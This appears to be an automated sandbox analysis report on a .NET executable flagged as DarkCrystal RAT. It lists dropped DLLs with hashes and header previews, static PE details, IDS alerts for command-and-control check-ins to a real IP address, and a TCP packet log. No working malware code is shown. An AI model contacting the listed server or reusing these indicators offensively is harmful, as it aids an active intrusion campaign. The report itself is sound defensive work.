SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yGbhhxRG.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yjTManQC.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zNmcoJTF.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zVWvTsuK.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zVsflLNl.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zWbEFDzT.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.76608752565073
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXiAuSvTQFAqvoYIHKNvj:Vx993DEUdXcTQGYIM
MD5:	6AA0D231EA321EBBADCB0F946F59EE54
SHA1:	E0061962137A60168372256A6EA1F6C63E4D1AD9
SHA-256:	5562B18EA1B8175E405F4F79A38A8E0D7EEAFD07A87AE4FD2E3F9AA11464471E
SHA-512:	011C7CFAF598C84D34CB56FDD26B500EFF5BD363B83A1049FF14FC7CBD9AC65B4A8A9FD1E81B4FBFDE8E3FE7AE361C8F831FEA81AF4F8F0AC160C5ECB0C94D07
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 22/12/2024 11:32:31..11:32:31, error: 0x80072746.11:32:36, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.821844595138407
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	vb8DOBZQ4X.exe
File size:	3'656'704 bytes
MD5:	67efb6282221428e7ff63b87df2f6522
SHA1:	d358efb4f979b90c159b505d374f475253d04367
SHA256:	f39e16190b3c97670dbd39c9ddada53857c38be6737d9f379b57d706292d5815
SHA512:	00443a9f7dda6d9d75d5ad39a802d66e26acb1f2f619462befbe82ac12c9ab47b5d02c6a721dea552d1bc498976ac11b4a6452f5bcfc887392abde49ff6f96f2
SSDEEP:	98304:wijoKCxGO1tnxHRMvCcxXue73F43f+YA:wi0KCxGO1tnVR+XV73u3WH
TLSH:	DC06F11565968F32C6641B318AA7023D4290D7373B12FF1F365F21D6A94BBF18EB21E2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................7.........N.7.. ....8...@.. .......................@8...........@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x77e24e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CDF1A5 [Tue Aug 27 15:32:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x37e200	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x380000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x382000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x37c254	0x37c400	49e59fe6bdf6d6b6ec94761dd254c6f2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x380000	0x320	0x400	4d929bd12c65d8046ed1d11acda64e5d	False	0.349609375	data	2.6411336922484443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x382000	0xc	0x200	894a450509e4bb332fc332b1c6b425fe	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x380058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-22T15:42:38.939292+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49731	37.44.238.250	80	TCP
2024-12-22T15:42:53.548740+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49738	37.44.238.250	80	TCP
2024-12-22T15:43:08.189502+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49739	37.44.238.250	80	TCP
2024-12-22T15:43:22.798770+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49741	37.44.238.250	80	TCP
2024-12-22T15:43:34.125461+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49763	37.44.238.250	80	TCP
2024-12-22T15:43:45.126967+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49790	37.44.238.250	80	TCP
2024-12-22T15:44:10.892784+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49851	37.44.238.250	80	TCP
2024-12-22T15:44:22.377309+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49877	37.44.238.250	80	TCP
2024-12-22T15:44:36.080596+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49912	37.44.238.250	80	TCP
2024-12-22T15:44:44.986970+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49931	37.44.238.250	80	TCP
2024-12-22T15:44:53.799560+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49953	37.44.238.250	80	TCP
2024-12-22T15:45:02.612149+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49975	37.44.238.250	80	TCP
2024-12-22T15:45:11.346640+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49995	37.44.238.250	80	TCP
2024-12-22T15:45:24.971787+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50017	37.44.238.250	80	TCP
2024-12-22T15:45:42.987607+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50019	37.44.238.250	80	TCP
2024-12-22T15:45:52.331454+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50020	37.44.238.250	80	TCP
2024-12-22T15:46:05.722259+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50021	37.44.238.250	80	TCP
2024-12-22T15:46:19.488097+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50022	37.44.238.250	80	TCP
2024-12-22T15:46:32.347521+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50023	37.44.238.250	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 22, 2024 15:42:37.505218983 CET	49731	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:37.625020981 CET	80	49731	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:37.625226974 CET	49731	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:37.625878096 CET	49731	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:37.746334076 CET	80	49731	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:37.972191095 CET	49731	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:38.092343092 CET	80	49731	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:38.897340059 CET	80	49731	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:38.939291954 CET	49731	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:39.131508112 CET	80	49731	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:39.173705101 CET	49731	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:39.427146912 CET	49731	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:52.101694107 CET	49738	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:52.223022938 CET	80	49738	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:52.223145962 CET	49738	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:52.223566055 CET	49738	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:52.366583109 CET	80	49738	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:52.580316067 CET	49738	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:52.701283932 CET	80	49738	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:53.494348049 CET	80	49738	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:53.548739910 CET	49738	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:53.731715918 CET	80	49738	37.44.238.250	192.168.2.4
Dec 22, 2024 15:42:53.783066034 CET	49738	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:42:53.907510996 CET	49738	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:06.753546000 CET	49739	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:06.873846054 CET	80	49739	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:06.873970985 CET	49739	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:06.874429941 CET	49739	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:06.994431019 CET	80	49739	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:07.220925093 CET	49739	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:07.340806961 CET	80	49739	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:08.144661903 CET	80	49739	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:08.189502001 CET	49739	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:08.379590988 CET	80	49739	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:08.424690962 CET	49739	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:09.027822018 CET	49739	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:21.363823891 CET	49741	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:21.483917952 CET	80	49741	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:21.483992100 CET	49741	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:21.484421968 CET	49741	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:21.667524099 CET	80	49741	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:21.830423117 CET	49741	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:21.950361967 CET	80	49741	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:22.755959988 CET	80	49741	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:22.798769951 CET	49741	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:22.996818066 CET	80	49741	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:23.048763990 CET	49741	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:23.208573103 CET	49741	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:32.607918024 CET	49763	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:32.727804899 CET	80	49763	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:32.727874994 CET	49763	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:32.728122950 CET	49763	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:32.847932100 CET	80	49763	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:33.080248117 CET	49763	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:33.200412035 CET	80	49763	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:34.008217096 CET	80	49763	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:34.125461102 CET	49763	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:34.247536898 CET	80	49763	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:34.460001945 CET	49763	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:34.557182074 CET	49763	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:43.599194050 CET	49790	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:43.723521948 CET	80	49790	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:43.723619938 CET	49790	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:43.723961115 CET	49790	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:43.847399950 CET	80	49790	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:44.080337048 CET	49790	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:44.200417042 CET	80	49790	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:44.997910976 CET	80	49790	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:45.126966953 CET	49790	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:45.232017040 CET	80	49790	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:45.439455986 CET	49790	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:45.507728100 CET	49790	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:58.264349937 CET	49825	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:58.385168076 CET	80	49825	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:58.385251045 CET	49825	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:58.385649920 CET	49825	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:58.505297899 CET	80	49825	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:58.736679077 CET	49825	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:58.857239008 CET	80	49825	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:59.658035994 CET	80	49825	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:59.705169916 CET	49825	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:43:59.891813993 CET	80	49825	37.44.238.250	192.168.2.4
Dec 22, 2024 15:43:59.939533949 CET	49825	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:00.145004988 CET	49825	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:09.446204901 CET	49851	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:09.569428921 CET	80	49851	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:09.569541931 CET	49851	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:09.569848061 CET	49851	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:09.689296007 CET	80	49851	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:09.924226046 CET	49851	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:10.043780088 CET	80	49851	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:10.850394011 CET	80	49851	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:10.892784119 CET	49851	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:11.075510979 CET	80	49851	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:11.189666033 CET	49851	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:11.286731005 CET	49851	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:20.773735046 CET	49877	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:20.893486023 CET	80	49877	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:20.893572092 CET	49877	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:20.893887043 CET	49877	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:21.013860941 CET	80	49877	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:21.252563953 CET	49877	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:21.372109890 CET	80	49877	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:22.169946909 CET	80	49877	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:22.377309084 CET	49877	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:22.403672934 CET	80	49877	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:22.486715078 CET	49877	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:22.714334011 CET	49877	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:34.475018024 CET	49912	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:34.596071005 CET	80	49912	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:34.596187115 CET	49912	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:34.596466064 CET	49912	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:34.716321945 CET	80	49912	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:34.956576109 CET	49912	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:35.076486111 CET	80	49912	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:35.866362095 CET	80	49912	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:36.080595970 CET	49912	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:36.100238085 CET	80	49912	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:36.189977884 CET	49912	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:36.248241901 CET	49912	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:43.550030947 CET	49931	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:43.669713974 CET	80	49931	37.44.238.250	192.168.2.4
